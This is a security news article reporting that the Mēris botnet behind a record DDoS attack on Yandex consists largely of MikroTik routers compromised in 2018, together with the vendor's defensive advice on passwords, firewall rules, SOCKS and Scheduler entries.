Mēris botnet, responsible for the largest application layer DDoS attack recorded to date that targeted the Russian Internet giant Yandex last week, is targeting MikroTik routers compromised in 2018, according to Latvian network equipment manufacturer MikroTik.

A joint investigation conducted by Yandex and Qrator Labs revealed that Mēris (which means "Plague" in the Latvian language) is comprised of more than 200,000 bots, with the vast majority of the vulnerable devices being MikroTik routers running various versions of RouterOS.

According to MikroTik, the bots are in fact the routers that were compromised in 2018, when MikroTik RouterOS had a vulnerability, that was quickly patched. The vendor explained that the attacks are targeting devices which had not been properly secured, despite the availability of a patch that could prevented the infection.

“Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change password, re-check your firewall if it does not allow remote access to unknown parties, and look for scripts that you did not create,” MikroTik’s employee said in a blog post.

“As far as we know right now - There are no new vulnerabilities in these devices. RouterOS has been recently independently audited by several contractors.”

MikroTik went on to say it attempted to inform customers about the issue but many of them have not been in contact with the company and are not actively monitoring their devices.

Router owners are advised to change password, re-check their firewall settings to block untrusted remote access and check for suspicious scripts. The company also recommends to disable SOCKS and look in the System -> Scheduler menu and disable all suspicious rules.

“By default, there should be no Scheduler rules, and SOCKS should be off,” MikroTik says.